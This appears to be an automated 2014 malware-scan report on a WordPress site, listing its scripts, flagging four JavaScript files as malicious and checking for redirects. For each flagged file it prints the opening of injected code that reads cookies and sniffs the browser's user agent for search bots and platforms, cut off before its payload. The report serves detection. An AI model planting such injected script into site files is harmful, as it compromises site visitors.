Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=trimuser.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://trimuser.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 09 Oct 2014 17:52:37 GMT Location: http://www.trimuser.com/ Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: kpg_stop_spammers_time=1412877158; expires=Thu, 09-Oct-2014 17:53:38 GMT X-Pingback: http://www.trimuser.com/xmlrpc.php | clean |
http://www.trimuser.com/ | 200 OK Content-Length: 105038 Content-Type: text/html | clean |
http://www.trimuser.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96894 Content-Type: application/javascript | clean |
http://www.trimuser.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8287 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o Antivirus reports:
| ||
http://www.trimuser.com/wp-content/plugins/jetpack/_inc/postmessage.js?ver=3.1.1 | 200 OK Content-Length: 20702 Content-Type: application/javascript | clean |
http://www.trimuser.com/wp-content/plugins/jetpack/_inc/jquery.inview.js?ver=3.1.1 | 200 OK Content-Length: 6677 Content-Type: application/javascript | clean |
http://www.trimuser.com/wp-content/plugins/jetpack/_inc/jquery.jetpack-resize.js?ver=3.1.1 | 200 OK Content-Length: 9191 Content-Type: application/javascript | clean |
http://www.trimuser.com/wp-content/plugins/wp-whos-online/wp-whos-online.js?ver=1 | 200 OK Content-Length: 5625 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o } } $o.addClass( oclass ).removeClass( remove ); }); } function toggleUpdates() { if (0 == wpwhosonline.getwpwhosonlineUpdate) { wpwhosonline.getwpwhosonlineUpdate = setInterval(getwpwhosonline, 30000); } else { clearInterval(wpwhosonline.getwpwhosonlineUpdate); wpwhosonline.getwpwhosonlineUpdate = '0'; } } toggleUpdates(); updateRecents(); }); Antivirus reports:
| ||
http://www.trimuser.com/wp-content/themes/graphene/js/jquery.tools.min.js?ver=4.0 | 200 OK Content-Length: 12119 Content-Type: application/javascript | clean |
http://www.trimuser.com/wp-content/themes/graphene/js/graphene.js?ver=4.0 | 200 OK Content-Length: 9533 Content-Type: application/javascript | clean |
http://www.trimuser.com/mobiquo/smartbanner/appbanner.js | 200 OK Content-Length: 13451 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o } } else { val = computedStyle[ measure ]; if ( val < 0 || val === null ) { val = elem.style[ measure ] || 0; } val = parseFloat( val ) || 0; if ( isOuter ) { val += paddingA + paddingB + marginA + marginB + borderA + borderB; } } return val; } Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21308 Content-Type: text/javascript | clean |
http://www.trimuser.com/wp-content/plugins/jetpack/modules/photon/photon.js?ver=20130122 | 200 OK Content-Length: 2465 Content-Type: application/javascript | clean |
http://www.trimuser.com/wp-content/plugins/bbpress/templates/default/js/editor.js?ver=2.5.4-5380 | 200 OK Content-Length: 2486 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o if ( typeof( tinymce ) !== 'undefined' ) { if ( ! tinymce.activeEditor.isHidden() ) { var editor = tinymce.activeEditor.editorContainer; jQuery( '#' + editor + ' td.mceToolbar > a' ).focus(); } else { jQuery( 'textarea.bbp-the-content' ).focus(); } } else { jQuery( 'textarea.bbp-the-content' ).focus(); } e.preventDefault(); } }); }); Antivirus reports:
| ||
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201441 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2014Octaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: trimuser.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 09 Oct 2014 17:52:37 GMT
Location: http://www.trimuser.com/
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: kpg_stop_spammers_time=1412877158; expires=Thu, 09-Oct-2014 17:53:38 GMT
X-Pingback: http://www.trimuser.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: trimuser.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 09 Oct 2014 17:52:37 GMT
Location: http://www.trimuser.com/
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: kpg_stop_spammers_time=1412877158; expires=Thu, 09-Oct-2014 17:53:38 GMT
X-Pingback: http://www.trimuser.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: trimuser.com
Referer: http://www.google.com/search?q=trimuser.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: trimuser.com
Referer: http://www.google.com/search?q=trimuser.com
Result:
The result is similar to the first query. There are no suspicious redirects found.